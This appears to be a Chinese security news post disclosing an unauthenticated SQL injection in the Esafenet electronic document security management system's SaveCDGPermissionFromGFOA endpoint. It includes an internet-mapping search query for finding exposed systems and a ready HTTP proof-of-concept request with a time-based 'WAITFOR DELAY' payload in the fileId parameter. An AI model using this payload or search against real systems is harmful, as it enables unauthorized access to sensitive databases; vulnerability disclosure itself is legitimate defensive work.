SQL注入漏洞

guozi • 2024年6月5日下午3:19 • 行业资讯

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

漏洞信息

漏洞复现

复现信息

语法：

app='亿赛通-电子文档安全管理系统'

测绘搜索

POC：

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1

漏洞复现

复现信息

复现-1

复现-2

更多内容

发现更多

原创文章，作者：guozi，如若转载，请注明出处：https://www.sudun.com/ask/90243.html

赞 (0)

0 0

要避免的 9 个 SQL 错误

上一篇 2024年6月5日下午3:02

SqlSugar，就这个Feel 倍儿爽！

下一篇 2024年6月5日下午3:20

国外空间

国外空间，这个看似陌生的词汇，却是近年来备受关注的热门话题。它是指在国外租用服务器空间来搭建网站、存储数据等业务。那么，什么是国外空间？它有哪些优势和适用场景？价格又如何标准？如何…

牛晓晓
行业资讯 2024年4月19日
00
seo是什么意思中文翻译

SEO，这个在互联网行业中频繁出现的词汇，你是否有听说过？它究竟是什么意思，又有着怎样的中文翻译及其含义呢？或许你对于这个名词还不是很熟悉，但它却在当今的互联网时代扮演着重要的角色…

牛晓晓
行业资讯 2024年4月12日
00
群控系统电脑配置，群控系统搭建教程

什么是群控服务器？群组管理服务器是用于管理和控制多台计算机的专用服务器，其主要功能是提高工作效率、简化管理流程。介绍群组管理服务器的功能和优点。 1、集中管理介绍群组管理服务器…

牛晓晓
行业资讯 2024年3月22日
00
ip地址被墙查询，ip 被墙

随着互联网的发展，我们每天都会使用各种网络服务。但是你有没有遇到过这样的情况：你想远程连接到另一个网络，但你的IP被封锁了，那么为什么会出现这种情况呢？更重要的是，如果IP被封锁，…

牛晓晓
行业资讯 2024年5月7日
00

发表回复